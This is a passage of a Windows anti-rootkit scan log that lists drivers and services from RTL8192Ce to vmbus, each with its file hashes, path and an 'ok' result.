20:47:20.0514 0x1e50  [ D751C8E0BE70D3D5D68439BC934EEBC4, 7A2603F7B63B9AC7215F6ABD0C7729ED273D3F08FC575116C48E325D71944BB8 ] RTL8192Ce       C:\windows\system32\DRIVERS\rtwlane.sys
20:47:20.0545 0x1e50  RTL8192Ce - ok
20:47:20.0607 0x1e50  [ D751C8E0BE70D3D5D68439BC934EEBC4, 7A2603F7B63B9AC7215F6ABD0C7729ED273D3F08FC575116C48E325D71944BB8 ] RTWlanE         C:\windows\system32\DRIVERS\rtwlane.sys
20:47:20.0639 0x1e50  RTWlanE - ok
20:47:20.0670 0x1e50  [ 752EC7DCD2F96871A3857EEE6AFE965A, 1D0640966B9147A06ED0E733711773E6B4AB8AC6D962D5B369ECB04170D18AD8 ] s3cap           C:\windows\System32\drivers\vms3cap.sys
20:47:20.0670 0x1e50  s3cap - ok
20:47:20.0763 0x1e50  [ F1DA34D64F2BA200D28A7451804E2FEE, 8BDF328F18F1EB58AC0E383ABA7985BA69EA9622B262CD524E3390FDE824DEEB ] SamSs           C:\windows\system32\lsass.exe
20:47:20.0763 0x1e50  SamSs - ok
20:47:20.0810 0x1e50  [ 9C7B28CE0D136DB226E24DB3BC817F92, E9DE55D6432ADD08EC75F99F2B5D2BD1F553F4EE55991B1767B1578351EE0BF2 ] sbp2port        C:\windows\system32\drivers\sbp2port.sys
20:47:20.0810 0x1e50  sbp2port - ok
20:47:20.0857 0x1e50  [ 14316954FCE79C9DE5A0AFF9D42C83AA, B60FB1FAC0299F9560761411711E86EDFA2F8D27B58230E2E4BB37736FAB2287 ] SCardSvr        C:\windows\System32\SCardSvr.dll
20:47:20.0857 0x1e50  SCardSvr - ok
20:47:20.0888 0x1e50  [ 5D7733A12756B267FCA021672B26BC9E, 01CE5B5F49914B9E099BD909A66296F3A40644AE47BA1D5EBFFB30CD33C70A4A ] scfilter        C:\windows\system32\DRIVERS\scfilter.sys
20:47:20.0888 0x1e50  scfilter - ok
20:47:20.0997 0x1e50  [ 201C397A73DFEE109490F4BA1168CFC2, 74FC2A30CBF2E2197E75860A3B308CDCBEB3C28794ABED388B493505A2D84BAA ] Schedule        C:\windows\system32\schedsvc.dll
20:47:21.0029 0x1e50  Schedule - ok
20:47:21.0060 0x1e50  [ BAF8F0F55BC300E5F882E521F054E345, FB228DB18F2FA55D8BA35A7E6778EE5D2EB0C29D384F1A0A868F90AE706188D7 ] SCPolicySvc     C:\windows\System32\certprop.dll
20:47:21.0060 0x1e50  SCPolicySvc - ok
20:47:21.0107 0x1e50  [ F58B030A0664385C707B8C1C63682041, E46AADAA2CD687B9A4B564DC5B002493C8480542588E660BC3DF89EAF9DB0427 ] sdbus           C:\windows\System32\drivers\sdbus.sys
20:47:21.0122 0x1e50  sdbus - ok
20:47:21.0169 0x1e50  [ 92968277ED491E4B3DDA361E3952361E, 71C50853BB2126A34C7CD014EE44D4B8B39F589E2E8E8E8F4C982E07498E3899 ] SDRSVC          C:\windows\System32\SDRSVC.dll
20:47:21.0169 0x1e50  SDRSVC - ok
20:47:21.0216 0x1e50  [ BB107AA9980B0DA4E19A3A90C3BD4460, BCB4CF0FFF1FD57302557B68044A88C8EEAAE57C2FEAE8EAD1F410F960298B6D ] sdstor          C:\windows\System32\drivers\sdstor.sys
20:47:21.0216 0x1e50  sdstor - ok
20:47:21.0263 0x1e50  [ 3EA8A16169C26AFBEB544E0E48421186, 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D ] secdrv          C:\windows\system32\drivers\secdrv.sys
20:47:21.0263 0x1e50  secdrv - ok
20:47:21.0325 0x1e50  [ CD282626738B6BC92B6E7CD0AAE95B63, 1A56567C781786C85C63E24E79186EE5C82D3EB2679061B21BA0571A3A6CB7F5 ] seclogon        C:\windows\system32\seclogon.dll
20:47:21.0325 0x1e50  seclogon - ok
20:47:21.0356 0x1e50  [ 9C51620998F0763039DFA6BF68E475ED, 9E496ADE7CE9A446BE8A2C2FC61B462D966778A94A4C147AABBD25C4821C2BCE ] SENS            C:\windows\System32\sens.dll
20:47:21.0372 0x1e50  SENS - ok
20:47:21.0403 0x1e50  [ 0D50B4B860DAB65241628D04CD33ACAE, 2AA897C3F9ED076AB9244A32745D18489B076F3ED28A35B868C472131C5B5B46 ] SensrSvc        C:\windows\system32\sensrsvc.dll
20:47:21.0403 0x1e50  SensrSvc - ok
20:47:21.0434 0x1e50  [ 87C46B239A7EEF30FDFDD5E9BD46130C, F36FB5B20AC58FBD31F7E636059D2D865B751E178E51A03B94ABE0BBD1AB1EC9 ] SerCx           C:\windows\system32\drivers\SerCx.sys
20:47:21.0450 0x1e50  SerCx - ok
20:47:21.0481 0x1e50  [ 7A1F9347C85FD55E39B8A76B3A25C5AD, 03AF3B23285278A38F4CBEAB7FD326A48FA1EC7F8D044C059CE5403C6D225639 ] Serenum         C:\windows\System32\drivers\serenum.sys
20:47:21.0481 0x1e50  Serenum - ok
20:47:21.0512 0x1e50  [ F640A0A218BBF857F1D04A15D7D939F6, 948C13886281FE7947E10FB7B34D5CCFE512FB632F1132B6062AC85149F79950 ] Serial          C:\windows\System32\drivers\serial.sys
20:47:21.0512 0x1e50  Serial - ok
20:47:21.0543 0x1e50  [ F1A5F56B2620B862CC28FF96A0A6DAAB, E5367212B2CADF3820D657CFC27CD961547E28DAB950C68E1380CF97FB68F3F4 ] sermouse        C:\windows\System32\drivers\sermouse.sys
20:47:21.0543 0x1e50  sermouse - ok
20:47:21.0642 0x1e50  [ CB60A60340788C8D6DE2A269D28086AB, 2D8948E59BB9B00E16D20E425F80E7B862957DBAC9A4D1484E5191FAF333B60D ] SessionEnv      C:\windows\system32\sessenv.dll
20:47:21.0658 0x1e50  SessionEnv - ok
20:47:21.0673 0x1e50  [ 7EE65419B29302C795714FF8073969A1, E28D89A5423E3A5062030EB2418E9435DD5D8B9D16570046E782D3FCFDA2E79A ] sfloppy         C:\windows\System32\drivers\sfloppy.sys
20:47:21.0673 0x1e50  sfloppy - ok
20:47:21.0736 0x1e50  [ 090AE16F79C8EAD04E6031F863DA85F3, 3F27BE46DF602B53940414A6E9FEB23B36CFFB8E9A7F41440C3315B8E27D0029 ] SharedAccess    C:\windows\System32\ipnathlp.dll
20:47:21.0751 0x1e50  SharedAccess - ok
20:47:21.0798 0x1e50  [ A77F3ABE13FCC698511E5DEC7ACEBD5F, 78A43FDA9F770FD8BA107605DB44BC71D8B89D7E75560DA783AA6356C1873C15 ] ShellHWDetection C:\windows\System32\shsvcs.dll
20:47:21.0814 0x1e50  ShellHWDetection - ok
20:47:21.0860 0x1e50  [ 2560721D6F16D5B611C36A3A9D28C1B2, 15C30404902654ABA5DB5367FC5BD31343B12A3FC22B4BC5A26B09016447B5ED ] SiSRaid2        C:\windows\system32\drivers\SiSRaid2.sys
20:47:21.0860 0x1e50  SiSRaid2 - ok
20:47:21.0892 0x1e50  [ 3AA8FDE1DBF65BB8B88B053529554A0D, 8060D946344D043D336F4735363C23C37C91A6DB3F81E575C267B2EC2BECB0EC ] SiSRaid4        C:\windows\system32\drivers\sisraid4.sys
20:47:21.0907 0x1e50  SiSRaid4 - ok
20:47:21.0970 0x1e50  [ E660156A4588A84305CB772FD2C0DB21, 9492EB6578D4A689945E1FC2440EFA77D461049CDB2D00A645969A71B7DA68E1 ] SNMPTRAP        C:\windows\System32\snmptrap.exe
20:47:21.0970 0x1e50  SNMPTRAP - ok
20:47:22.0032 0x1e50  [ 9110193D93960E38B8692E4519C75D72, 789381B4CCC056EE431E78E2339AC9802264A1CE4B378DDA9769649664C9A7A0 ] spaceport       C:\windows\system32\drivers\spaceport.sys
20:47:22.0032 0x1e50  spaceport - ok
20:47:22.0079 0x1e50  [ 3D8679C8DF52EB26EB7583A4E0A29202, DCD9B69299275857712AB200C014AE820C8A9F7E53C4A335A84518FBE4BB56BB ] SpbCx           C:\windows\system32\drivers\SpbCx.sys
20:47:22.0079 0x1e50  SpbCx - ok
20:47:22.0157 0x1e50  [ 3F215BF2D4D8D6756298B25B579772C2, 744192D1635E5D296BFD399E870B70592202CEAF95C31C2D2B226A868D33A3FD ] Spooler         C:\windows\System32\spoolsv.exe
20:47:22.0172 0x1e50  Spooler - ok
20:47:22.0375 0x1e50  [ 061A977C920FBE4BF71FF47C966DDDCA, 746516396B72E4ADB05D978C819CD45FE44EE194756F6DA50121D755439CA590 ] sppsvc          C:\windows\system32\sppsvc.exe
20:47:22.0500 0x1e50  sppsvc - ok
20:47:22.0562 0x1e50  [ 0F1FCD575A03ABDE13FCA9D0ADE4DDA6, 61EEB1349489CB85204F1B4E398BE24EDC01FB914120C9DD0487F8EE1EDA055E ] srv             C:\windows\system32\DRIVERS\srv.sys
20:47:22.0562 0x1e50  srv - ok
20:47:22.0625 0x1e50  [ 8504ADDE9C146C6295B16D13A0007560, 715E3752AE4A276FA8DAFA3B52B699C45D97E747CB25FE4AE307241D206319B7 ] srv2            C:\windows\system32\DRIVERS\srv2.sys
20:47:22.0640 0x1e50  srv2 - ok
20:47:22.0703 0x1e50  [ BB0F9E19C5CE4DC765B263E2A5561DE1, F7DBC96E049625E4312D8F588FCF2B4AC6318C04D04758982FE9B51DABEC2DAE ] srvnet          C:\windows\system32\DRIVERS\srvnet.sys
20:47:22.0703 0x1e50  srvnet - ok
20:47:22.0750 0x1e50  [ 7A20882D76D4A78240A5AC9F2C2EBA21, ACA05211EE542999A118BBD2CD051038A7DC8C40C4B8971DC6514BA90E90EC61 ] SSDPSRV         C:\windows\System32\ssdpsrv.dll
20:47:22.0765 0x1e50  SSDPSRV - ok
20:47:22.0796 0x1e50  [ D233B16999A8E626F6004BD7814C57EC, 5BBFE5DDF1269617ABD1BDBED85A79D99BB52EA29C2BB3A8F4A1827BFAA1A747 ] SstpSvc         C:\windows\system32\sstpsvc.dll
20:47:22.0812 0x1e50  SstpSvc - ok
20:47:22.0906 0x1e50  [ AFE32AFD30464FC59CB8E88DC72F66FA, 24644F8AA47E61B98EF867BE18A9BE383822D64F3AADF2ED35E42FBFBA7B340F ] Steam Client Service C:\Program Files (x86)\Common Files\Steam\SteamService.exe
20:47:22.0937 0x1e50  Steam Client Service - ok
20:47:22.0968 0x1e50  [ 4E85355B94CFCB67C135F6521A4895A7, AC4FC65C1E62A54B3834E7FE0A2B1ECC48A2AA563AE5BD508326EE68FFFBBEEE ] stexstor        C:\windows\system32\drivers\stexstor.sys
20:47:22.0968 0x1e50  stexstor - ok
20:47:23.0015 0x1e50  [ BAC8A721736AECC55A4F71523AEAB65F, B52E1303B13A961A5FC190829E55B6F28ACA409A6EEF44B358D1D210558FE1D8 ] stisvc          C:\windows\System32\wiaservc.dll
20:47:23.0030 0x1e50  stisvc - ok
20:47:23.0093 0x1e50  [ B240874B2CA0CD02E8CD11E140B14C57, 0FDBEE3DB644175A30065CAF020F375703ADC45A33221788C010F3111707FC25 ] storahci        C:\windows\system32\drivers\storahci.sys
20:47:23.0093 0x1e50  storahci - ok
20:47:23.0124 0x1e50  [ F74DBC95A57B1EE866D3732EB5F79BE2, E4FE9D5CD0A385ACB60D5D5E8D969F26C3A6BC0C08FF0838DBE9CA106229C8DE ] storflt         C:\windows\system32\DRIVERS\vmstorfl.sys
20:47:23.0140 0x1e50  storflt - ok
20:47:23.0171 0x1e50  [ 5337E138B49ED1F44CCBA4073BC35C20, 2B296973215E3865A56C46DC3D27F1460D96BC321558CE7A911B05B0E7BF397F ] StorSvc         C:\windows\system32\storsvc.dll
20:47:23.0171 0x1e50  StorSvc - ok
20:47:23.0218 0x1e50  [ 543CD3CC0E05B8D8815E0D4F040B6F59, 4B57C9534E94A0A67FC82DBD4FAECACA180BEC281FB477550A37C0A04777E09E ] storvsc         C:\windows\system32\drivers\storvsc.sys
20:47:23.0218 0x1e50  storvsc - ok
20:47:23.0264 0x1e50  [ 8BC1C1ED6EF9C985A3FAA6A72F41679A, 82CC77030D23013572B4A64A64B6156789F253BF56268B790093CE3D345410A0 ] svsvc           C:\windows\system32\svsvc.dll
20:47:23.0264 0x1e50  svsvc - ok
20:47:23.0296 0x1e50  [ 4AFD66AAE74FFB5986BC240744DC5FC9, 0C9347614E3FD3B4D3B29FA4A5DA23FF6EE4CD9A1FFC378B855B8DE61B2876CF ] swenum          C:\windows\System32\drivers\swenum.sys
20:47:23.0296 0x1e50  swenum - ok
20:47:23.0342 0x1e50  [ 502F9488540051F3E6C39889ECFA76BB, 22ABD681BE4CF8A1F484C6363C1334B1EF7A6C074D837B0121DE1896887B84C6 ] swprv           C:\windows\System32\swprv.dll
20:47:23.0358 0x1e50  swprv - ok
20:47:23.0405 0x1e50  [ 3675657B3A4A2868A2C2B2A160E4A3C9, 1E2D115D2454596B139360815B24574CF331920513E71EA151324DC2922BC59B ] SynTP           C:\windows\system32\DRIVERS\SynTP.sys
20:47:23.0405 0x1e50  SynTP - ok
20:47:23.0498 0x1e50  [ A06CB9269D29EE3D0F3F5630ABB660B8, 519A01FC7D9414B26CCBC23E7FB1CEAF1C91CD173B4F4A4025F8316B7460C584 ] SysMain         C:\windows\system32\sysmain.dll
20:47:23.0545 0x1e50  SysMain - ok
20:47:23.0602 0x1e50  [ 6FB88606C4A71E1BFAF97D63A676C673, D72F93A482E989ACA50F9647B7AD699A4656AEAACF377BB2B8CEBB094B748852 ] SystemEventsBroker C:\windows\System32\SystemEventsBrokerServer.dll
20:47:23.0602 0x1e50  SystemEventsBroker - ok
20:47:23.0649 0x1e50  [ A6C06C45C44AD06C70AF8899AEC15BDC, AC2CCCDBA6B94BA85A6D41B47343193D175786D4ECF71AE9C7766ADD63A1273F ] TabletInputService C:\windows\System32\TabSvc.dll
20:47:23.0664 0x1e50  TabletInputService - ok
20:47:23.0696 0x1e50  [ 88B7721AB551C4325036B25A34A2BF7B, 2817CC6294542524EC373A674535F913440736BEBE81233CA91D5ECD93620B02 ] TapiSrv         C:\windows\System32\tapisrv.dll
20:47:23.0711 0x1e50  TapiSrv - ok
20:47:23.0852 0x1e50  [ 0E0C16EE82E2F4EBC2FBCA24C8F00D9E, F8B2A0257442E00C5D7C5A15BBD84194D0F0C071424656CA4B8EC850B6898D10 ] Tcpip           C:\windows\system32\drivers\tcpip.sys
20:47:23.0914 0x1e50  Tcpip - ok
20:47:23.0992 0x1e50  [ 0E0C16EE82E2F4EBC2FBCA24C8F00D9E, F8B2A0257442E00C5D7C5A15BBD84194D0F0C071424656CA4B8EC850B6898D10 ] TCPIP6          C:\windows\system32\DRIVERS\tcpip.sys
20:47:24.0054 0x1e50  TCPIP6 - ok
20:47:24.0117 0x1e50  [ 8F2A13A5DF99D72FDDE87F502A66F989, 2228C62ACDB4CBBFDD2BE705E604E0B9A8AEA7146F65F2D8B9B2A2FB49ACFAE1 ] tcpipreg        C:\windows\system32\drivers\tcpipreg.sys
20:47:24.0117 0x1e50  tcpipreg - ok
20:47:24.0164 0x1e50  [ 58480A57ACF2671C343FD1D4BA990E34, 24AD9C808D06FABFE8E81242CAC8B5A91829F7D951B245865EF77B79BB795E3D ] tdcmdpst        C:\windows\system32\DRIVERS\tdcmdpst.sys
20:47:24.0164 0x1e50  tdcmdpst - ok
20:47:24.0210 0x1e50  [ 73DC722CE5DF26D7638CE2446F2655C7, 9B8E6F6DEA5E0C2AEAC24A31897D2E73F86EF44F1C25FEF82D2C860353793817 ] tdx             C:\windows\system32\DRIVERS\tdx.sys
20:47:24.0210 0x1e50  tdx - ok
20:47:24.0242 0x1e50  [ F7C8AB5D8AFFAA318D6A21093D139BF4, 0A35052EF7DC8615783A23897358D8C579BE694363615C9563FF629E7B719991 ] terminpt        C:\windows\System32\drivers\terminpt.sys
20:47:24.0242 0x1e50  terminpt - ok
20:47:24.0398 0x1e50  [ 541EE228D0DEF392F7B2DFD885DD021B, 594D6538FA4DB5EF4D130007D7C29051EC2EDCA39EBB119695B58E9CBB0EB728 ] TermService     C:\windows\System32\termsrv.dll
20:47:24.0413 0x1e50  TermService - ok
20:47:24.0444 0x1e50  [ 519A6F672FFF56B7D8EE8C730CEC8ECD, 2B36F10C0AE16A261DC0887B1050808BA1F0568F3879E4ABC3D370F08C3FADB7 ] Themes          C:\windows\system32\themeservice.dll
20:47:24.0444 0x1e50  Themes - ok
20:47:24.0491 0x1e50  [ 16E745743BABAF480B7718442F38B076, 4FF6C7CFB976BF24F2215DCAE4DCCA546A6758B1DE1F36C78251AFFE4D9CE249 ] Thotkey         C:\windows\System32\drivers\Thotkey.sys
20:47:24.0491 0x1e50  Thotkey - ok
20:47:24.0538 0x1e50  [ EEE908BE7143FCA48CF0CB87214E2AB8, 4F9BD299F559DD36DBD93489CFAA753F236FBB70946E034D2E2260059AE20962 ] THREADORDER     C:\windows\system32\mmcss.dll
20:47:24.0538 0x1e50  THREADORDER - ok
20:47:24.0600 0x1e50  [ 4515B9E4140F04FB3907692DF89FCA87, F68EC56524BDA877646E987BE7414C1D622BD9FF05A5AEADCA39030FDC2B0115 ] TimeBroker      C:\windows\System32\TimeBrokerServer.dll
20:47:24.0600 0x1e50  TimeBroker - ok
20:47:24.0678 0x1e50  [ 6C4F5CD42074DB52AE88FC4BAB2C54F7, B4E3B6A23C99A11186F4EE875871D459A7A03EF4565CA114B41FB3C982841A45 ] TMachInfo       C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
20:47:24.0678 0x1e50  TMachInfo - ok
20:47:24.0725 0x1e50  [ ED32035BDFECED1AD66D459FD9CC1140, B82A15FAB4CBB5A633B9BF722441D5B20D946B63DD10BBE2A89D3A8BA3BE3339 ] TODDSrv         C:\Windows\system32\TODDSrv.exe
20:47:24.0725 0x1e50  TODDSrv - ok
20:47:24.0788 0x1e50  [ CB92B9BD85B54DEECA1B05E5ABCEA1AA, F3FB06DFE9A70613512DB25BEF486271641BFF3D7684C2C0C4B09E1DB6B08F52 ] TOSHIBA eco Utility Service C:\Program Files\Toshiba\Teco\TecoService.exe
20:47:24.0803 0x1e50  TOSHIBA eco Utility Service - ok
20:47:24.0850 0x1e50  [ 36391C3953D191A2AF4556D5D706C641, 5191A35C86B6C98F2CBDDC23B5311ED62310345CEDE084A54BBF70CCF0F84C50 ] tos_sps64       C:\windows\system32\drivers\tos_sps64.sys
20:47:24.0866 0x1e50  tos_sps64 - ok
20:47:24.0912 0x1e50  [ 8608681DC6E2975815A593209A6432CD, 10DF382AABB97DD70900DD4D6D388A34614A67E762D956861C8D4D036947BFDA ] TPCHSrv         C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
20:47:24.0928 0x1e50  TPCHSrv - ok
20:47:24.0975 0x1e50  [ E94F7A7B48C7638D1F3F8089344C97B7, 276CDE59614D563A52529BCC4BFC726E5F5BE131C9C4142558A644D79328C810 ] TPM             C:\windows\system32\drivers\tpm.sys
20:47:24.0990 0x1e50  TPM - ok
20:47:25.0037 0x1e50  [ 8C8CF3041B27E7657ADD0EE17F6DBFCA, A6846478B9E7B0A509E5A28C6C7B66ED39F0247F9AFF01E3C3CADC0DBEF3CA00 ] TrkWks          C:\windows\System32\trkwks.dll
20:47:25.0037 0x1e50  TrkWks - ok
20:47:25.0115 0x1e50  [ 8ABBB5CE0C62E0A6D28F32F44B7F865C, 4C78FE2A4A25A758D5191C4EDB2A6FE691FF82E7C16C0F146DC96DAD87D4F64E ] TrustedInstaller C:\windows\servicing\TrustedInstaller.exe
20:47:25.0131 0x1e50  TrustedInstaller - ok
20:47:25.0178 0x1e50  [ 4E7C5FB10A50435523DE0CAA37DE2BD3, D6206DF61950F2541FB754E57C4D9EF9FA0CC1EDD6F6FA4E45F02B47958493F7 ] TsUsbFlt        C:\windows\system32\drivers\tsusbflt.sys
20:47:25.0178 0x1e50  TsUsbFlt - ok
20:47:25.0209 0x1e50  [ 16D684A820872EE54F6370703AC0B513, 795E20484358424CE9FA766937DD99413025A8AF967D03490392E8E02A382D0B ] TsUsbGD         C:\windows\System32\drivers\TsUsbGD.sys
20:47:25.0209 0x1e50  TsUsbGD - ok
20:47:25.0240 0x1e50  [ 78C9EE193AC2B4CBDBC48B620314D740, 41523E47D321BFF5778F5E453545B928C0A469C3BBA51578E74D6721D7DF9273 ] tunnel          C:\windows\system32\DRIVERS\tunnel.sys
20:47:25.0240 0x1e50  tunnel - ok
20:47:25.0271 0x1e50  [ 54BDBF3D4DED58DA78B702471C68D4CA, D12F9F09FFE7D38A5EE6BF79DB74D775A9861C3C87E06D7C23259E47247B1782 ] TVALZ           C:\windows\system32\drivers\TVALZ_O.SYS
20:47:25.0271 0x1e50  TVALZ - ok
20:47:25.0302 0x1e50  [ 55A9A23DD64EB7781FCAB565B028CD0E, 44CE0C8244F9AE6CCCDB49C29F6D35FE4CE8C92DE5B5D44D22DBD088DE83AA10 ] TVALZFL         C:\windows\system32\DRIVERS\TVALZFL.sys
20:47:25.0318 0x1e50  TVALZFL - ok
20:47:25.0334 0x1e50  [ 6D4F67CA56ACA2085DFA2CD89EAFBC1A, AA7DA2207C0236F47859A4791F9D7301E7ADB50A59D831DC859ECC7CA70D3E1D ] uagp35          C:\windows\system32\drivers\uagp35.sys
20:47:25.0349 0x1e50  uagp35 - ok
20:47:25.0396 0x1e50  [ 6FD6D03B7752C78712E5CFF29A305026, F09C5188AAFCF4C77B05BA1E604F9912782A9F1371F72F959288EBC2725407ED ] UASPStor        C:\windows\System32\drivers\uaspstor.sys
20:47:25.0412 0x1e50  UASPStor - ok
20:47:25.0474 0x1e50  [ 061BA3EE0D2BE17944990544008CF190, C9236D368EC2281B545E8C008BC2801F21A9716ED3D4DAEDB0751A5008346E81 ] UCX01000        C:\windows\System32\drivers\ucx01000.sys
20:47:25.0474 0x1e50  UCX01000 - ok
20:47:25.0538 0x1e50  [ 25C50F4EDF70D0A831E0566BD181CCF2, F2F9E86FB5617C16077D2073EC0AA747F76F1EB5148BA110347A84F3C3569F83 ] udfs            C:\windows\system32\DRIVERS\udfs.sys
20:47:25.0538 0x1e50  udfs - ok
20:47:25.0601 0x1e50  [ FB3475FEA1CCB0DAEA1EBE44D0E3BB7D, 16DE6E0894C356A58AF12BEC2FE9B188F147DD4B16CB2414DE600CE4127F929D ] UI0Detect       C:\windows\system32\UI0Detect.exe
20:47:25.0621 0x1e50  UI0Detect - ok
20:47:25.0655 0x1e50  [ 07FEBCDF24FABA0D47B635D85A0FFB7A, 452C04B14681EBCE8B1B25B75A1B7CC978722B7DDE54D624E17841B14ACCF65D ] uliagpkx        C:\windows\system32\drivers\uliagpkx.sys
20:47:25.0655 0x1e50  uliagpkx - ok
20:47:25.0702 0x1e50  [ 02CEB3FE6152668A7BA420B93B664860, 613F27540FD1EFE2442E326F507DACD5A25691C8481937022B7E1104F3E6E9E2 ] umbus           C:\windows\System32\drivers\umbus.sys
20:47:25.0702 0x1e50  umbus - ok
20:47:25.0718 0x1e50  [ 991EE6B5FC41EAEF99C8AF5B92F2CA09, 30AAD7D18FF5962CEC7180359D148EED5A1BF193DDB2B34508897FC3EBA692C3 ] UmPass          C:\windows\System32\drivers\umpass.sys
20:47:25.0718 0x1e50  UmPass - ok
20:47:25.0764 0x1e50  [ 43FEFB040A0CC30F795FBF544169594D, F2A730C0F7C883321C378D4564120A40428D7F8E393F02C8D6A08934795A35C7 ] UmRdpService    C:\windows\System32\umrdp.dll
20:47:25.0780 0x1e50  UmRdpService - ok
20:47:25.0827 0x1e50  [ 14D22C411854AA2560AFC94CD2D5E61F, BB376734733671C02319E6DB1800D41212694446FD65465498C92D4ECBFE7458 ] upnphost        C:\windows\System32\upnphost.dll
20:47:25.0842 0x1e50  upnphost - ok
20:47:25.0874 0x1e50  [ C9E9D59C0099A9FF51697E9306A44240, 78D9A7A5E5742962B6978F475BF06CB32262F1D214699D3D40538476A58012A1 ] USBAAPL64       C:\windows\System32\Drivers\usbaapl64.sys
20:47:25.0874 0x1e50  USBAAPL64 - ok
20:47:25.0936 0x1e50  [ 9E9F21FF91D7ECC0BCCB94D3FE52A959, 85461393D62ED939F6741C2D0A90C8AB34F4415173223BB4CFC119715D10E7A7 ] usbaudio        C:\windows\system32\drivers\usbaudio.sys
20:47:25.0936 0x1e50  usbaudio - ok
20:47:25.0983 0x1e50  [ C976C4306F9AE133D6BBD47FDFC3BF92, 820413D92D6A89055A7F26523BF5CC4B668610C4A06E8B0D163FBF929B1DFA9A ] usbccgp         C:\windows\System32\drivers\usbccgp.sys
20:47:25.0998 0x1e50  usbccgp - ok
20:47:26.0030 0x1e50  [ 427B6DB8C05A5A977E8C3525370A2595, C67222CA9123AE12D953995326B3B582C146CEA89594B7209DB0B1F628A0118D ] usbcir          C:\windows\System32\drivers\usbcir.sys
20:47:26.0030 0x1e50  usbcir - ok
20:47:26.0061 0x1e50  [ B24FDEB1B18496F1B463782235AA3AF1, 3F5036F36987C8007D03DAFC3EC30615515BE96D9A1DF879BCD4EB0E66CD50B1 ] usbehci         C:\windows\System32\drivers\usbehci.sys
20:47:26.0076 0x1e50  usbehci - ok
20:47:26.0108 0x1e50  [ 4875DC63E548812C75D4FDEF84970C89, 6A29306BAB6F95F0384E16533A9588A654A6E3CFC35D55A4CEB2B14EF34EEE19 ] usbfilter       C:\windows\system32\DRIVERS\usbfilter.sys
20:47:26.0108 0x1e50  usbfilter - ok
20:47:26.0154 0x1e50  [ F8C2A832DF9403F5EA8080CBDBDA95FB, 50E9455465672BC13EB945BEC132D2F30BA2EB25C68928D2B4C256F2DB292A83 ] usbhub          C:\windows\System32\drivers\usbhub.sys
20:47:26.0170 0x1e50  usbhub - ok
20:47:26.0201 0x1e50  [ E5F7328B1D29BCE791862CD3C0DD382A, E520D75CA6E4EDB06F576D97FB6B7CFD46A3EF3A3AC881537DE3BB8C862FE8C3 ] USBHUB3         C:\windows\System32\drivers\UsbHub3.sys
20:47:26.0217 0x1e50  USBHUB3 - ok
20:47:26.0295 0x1e50  [ 325F6179009B5A7F6118951A5BA422AB, 756CB2893530485E8C3ACFF5A40F4C6EB446E72B2296E8772058E407A5E066DE ] usbohci         C:\windows\System32\drivers\usbohci.sys
20:47:26.0295 0x1e50  usbohci - ok
20:47:26.0357 0x1e50  [ 9FDBA6982582A6F2354144980F641E7B, 054A65412CB22C5BE970FD3A266E140110D869B614B9F9894628D553CE82C991 ] usbprint        C:\windows\System32\drivers\usbprint.sys
20:47:26.0357 0x1e50  usbprint - ok
20:47:26.0388 0x1e50  [ AD91D1BBE5D3CF4501887DC1C09384FD, ED9E27CD1D52401087427EC20E389FBE2497193483C2E53E8DE5D70DACF5D928 ] usbscan         C:\windows\System32\drivers\usbscan.sys
20:47:26.0388 0x1e50  usbscan - ok
20:47:26.0420 0x1e50  [ BFC7FE4AAEB61317A921871B4085EF4B, CBC3FBAEAD6C82A437CC87A97007EF807C64053AB8FA5C3233C2A0CF6FC8D019 ] USBSTOR         C:\windows\System32\drivers\USBSTOR.SYS
20:47:26.0435 0x1e50  USBSTOR - ok
20:47:26.0482 0x1e50  [ 1ABF657259DB57F7E5558E4DF1357C0C, 34EAF5DEA3293CFA96BA81B036305FD90ABAE05B9CB73D4F54FB236448C1978C ] usbuhci         C:\windows\System32\drivers\usbuhci.sys
20:47:26.0482 0x1e50  usbuhci - ok
20:47:26.0515 0x1e50  [ 9EF7C01D3ACCBC243B5CB1A95865B2FF, 367A7640B4992E68EB3E1BBD78D3014742F4CC4056750E389048C653251DAD33 ] usbvideo        C:\windows\System32\Drivers\usbvideo.sys
20:47:26.0531 0x1e50  usbvideo - ok
20:47:26.0593 0x1e50  [ 8DC398D7B8E02C929A2096E74A170970, 87B3CE84D05F50C33935B28F0AFF1CB15DAA4530768BA1FB25C311609CD4B0A5 ] USBXHCI         C:\windows\System32\drivers\USBXHCI.SYS
20:47:26.0609 0x1e50  USBXHCI - ok
20:47:26.0640 0x1e50  [ F1DA34D64F2BA200D28A7451804E2FEE, 8BDF328F18F1EB58AC0E383ABA7985BA69EA9622B262CD524E3390FDE824DEEB ] VaultSvc        C:\windows\system32\lsass.exe
20:47:26.0640 0x1e50  VaultSvc - ok
20:47:26.0687 0x1e50  [ BACECBFF9C97F7627A60B0E0F1FE7EE8, DC82F767D066B93A48A090DC7146EBCCDC54B43C6CD9DF29A160E09E3A531DC8 ] vdrvroot        C:\windows\system32\drivers\vdrvroot.sys
20:47:26.0687 0x1e50  vdrvroot - ok
20:47:26.0780 0x1e50  [ 1B4488988E5E7512E6C5CD1255E9E973, B82C26E767A8895CFFD76C11D07D5C945C38E1BD32CC27D20A6C0FA7F6064FC5 ] vds             C:\windows\System32\vds.exe
20:47:26.0796 0x1e50  vds - ok
20:47:26.0827 0x1e50  [ 74FA2D4368DE6F6CE14393EDF1F342BE, C5CE4164B2C3D583A7FB8687ADEADCDB08D36A5AB1965E5FC6949AEED15881C8 ] VerifierExt     C:\windows\system32\drivers\VerifierExt.sys
20:47:26.0843 0x1e50  VerifierExt - ok
20:47:26.0890 0x1e50  [ 500BE6B2E49883720D0AE8BB859ED7A3, 4606B02A3E8123510676E554635EB5ECF9DC5F2B83928710C8563787C52CC102 ] vhdmp           C:\windows\System32\drivers\vhdmp.sys
20:47:26.0905 0x1e50  vhdmp - ok
20:47:26.0952 0x1e50  [ F5B4A14B00E89250C50982AC762DDD1D, 581CD97DD42E74A82F06BFB827DFC82618B4A8667ACA7E93C628BB0D056CE8F0 ] viaide          C:\windows\system32\drivers\viaide.sys
20:47:26.0952 0x1e50  viaide - ok
20:47:26.0983 0x1e50  [ 78DB50F7329F6D1311658DABFFFC8BE0, 8CB0C831608033C4BC1D2DA7FAA7D429333A3654E76A989F7AF85BFC5F086BE9 ] vmbus           C:\windows\system32\drivers\vmbus.sys
20:47:26.0983 0x1e50  vmbus - ok
